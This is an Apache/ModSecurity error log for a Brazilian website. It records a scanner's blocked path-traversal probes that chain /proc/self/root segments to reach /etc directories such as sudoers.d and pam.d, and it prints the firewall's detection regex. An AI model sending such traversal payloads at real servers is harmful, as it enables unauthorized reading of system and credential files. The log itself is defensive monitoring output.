[Tue Mar 17 15:21:13.364416 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.241.31:42396] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbmaBJNF7axNlVR0UgVgAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:21:15.121899 2026] [proxy_fcgi:error] [pid 19507:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:59108] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:21:15.512348 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.241.31:42402] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbm9Y0UrI5A3LftIwE2AAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:21:21.443818 2026] [:error] [pid 2473:tid 140411616036608] [client 74.7.241.31:58866] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmboaBJNF7axNlVR0UgXQAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:21:22.875504 2026] [:error] [pid 7004:tid 140411565680384] [client 74.7.243.128:60892] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbosU6Sx0TG1YjmQi3KAAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:21:24.522105 2026] [:error] [pid 17965:tid 140411708356352] [client 74.7.241.31:58868] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbpKt8Nd0UC_OcbVHSKAAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:21:27.353577 2026] [:error] [pid 18380:tid 140411691570944] [client 74.7.241.31:59624] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbp64xEDsg_V3ESNZUCwAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:21:30.324624 2026] [:error] [pid 17965:tid 140411565680384] [client 74.7.241.31:59640] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbqqt8Nd0UC_OcbVHSLQAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:21:33.211209 2026] [:error] [pid 9299:tid 140411691570944] [client 74.7.241.31:59650] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbrb-sgTmmJoPuMdy-YAAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:21:38.021861 2026] [proxy_fcgi:error] [pid 7004:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:59456] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:21:38.115952 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.241.31:59664] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbstY0UrI5A3LftIwE4AAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:21:44.308457 2026] [:error] [pid 9299:tid 140411574073088] [client 74.7.241.31:46150] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbuL-sgTmmJoPuMdy-agAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:21:47.163420 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.241.31:46166] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbu6BJNF7axNlVR0UgZQAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:21:49.341237 2026] [:error] [pid 17965:tid 140411699963648] [client 74.7.243.128:43638] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbvat8Nd0UC_OcbVHSNgAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:21:52.023333 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.241.31:41306] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbwNY0UrI5A3LftIwE6wAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:21:55.221995 2026] [:error] [pid 2473:tid 140411590858496] [client 74.7.241.31:41322] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbw6BJNF7axNlVR0UgbAAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:21:58.068106 2026] [:error] [pid 17965:tid 140411599251200] [client 74.7.241.31:60020] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbxqt8Nd0UC_OcbVHSOAAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:21:59.139152 2026] [proxy_fcgi:error] [pid 9299:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:59784] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:22:01.069274 2026] [:error] [pid 9299:tid 140411607643904] [client 74.7.241.31:60034] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbyb-sgTmmJoPuMdy-bwAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:22:04.307696 2026] [:error] [pid 6296:tid 140411565680384] [client 74.7.241.31:60044] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbzHIk7brgkOH-rIWTjAAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:22:09.515504 2026] [:error] [pid 7004:tid 140411590858496] [client 74.7.241.31:57298] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmb0cU6Sx0TG1YjmQi3NwAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:22:12.141976 2026] [:error] [pid 17965:tid 140411649607424] [client 74.7.241.31:57312] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmb1Kt8Nd0UC_OcbVHSPQAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:22:15.106025 2026] [:error] [pid 2473:tid 140411574073088] [client 74.7.241.31:57314] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmb16BJNF7axNlVR0UgcQAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:22:21.453950 2026] [proxy_fcgi:error] [pid 9299:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:60042] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:22:21.484202 2026] [:error] [pid 2598:tid 140411624429312] [client 74.7.241.31:52514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmb3Rj0p0SRWAqcjGGBYwAAAw4"], referer: 